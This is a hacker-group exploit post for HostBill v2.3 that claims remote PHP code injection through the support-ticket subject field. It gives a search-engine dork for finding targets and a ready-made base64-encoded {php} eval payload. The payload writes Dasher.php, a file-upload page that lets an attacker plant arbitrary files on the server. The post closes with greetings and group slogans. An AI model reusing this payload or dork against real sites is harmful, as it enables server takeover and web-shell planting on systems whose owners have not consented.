=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah, The Most Beneficent, The Most Merciful}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[~] Tybe: suffering from RemotE injection php code
[~] Vendor:hostbillapp.com
[+] Software:HostBill
[+] Version : v2.3
[~]
[+] author:Dr.DaShE
[~] TEAM: Team 403
[?]
[-] contact: Dasher403[at]gmail.com
[?] Date: 2g.J4N.2oll
[?]
[?] T!ME: 04:46 AM ara-blackhat
[^]
[?]
===============================================================================
# HostBill script suffering from RemotE injection php code exploit
===============================================================================
[!] Exploit Already Tested ... on apache linux server
Dork: Powered by HostBill
[^] Error console:-
http://localhost/billing/index.php?/tickets/new/
[?] poC <X> exploit:-
http://localhost/billing/index.php?/tickets/new/
inject your evil php code exploit in subject field
encrypt by base64 encoder
ex:
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq
MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdS
aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2
SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQ
anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lp
QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3
blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hs
SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dl
eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lI
ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5J
K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKCJEYXNoZXIucGhwIiwidyIpOwpm
d3JpdGUoJGZvLCRjb2RlKTs='));{/php}
http://localhost/Dasher.php
[~]-----------------------------{(Team 403)}------------------------------------------------
#
[~] Greetz tO:Nex & WeeD & R3d D3v!L & HITLR & Red virus & Dr.Dmar & MaFiA & Mr.NsaaNy & ...etc ;
#
[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # ;
#
[?] special SupPoRT : ABH-Sec.Com & packet storm & 1337day & Maksymilian Arciemowicz # ;
#
[~]spechial FR!ND: they all are spechials ;) #;
#
[~] !'M 4R48!4N 3XPL0!73R. #;
#
[~](>D!R 4ll 0R D!E<) #;
#
[~]---------------------------------------------------------------------------------------------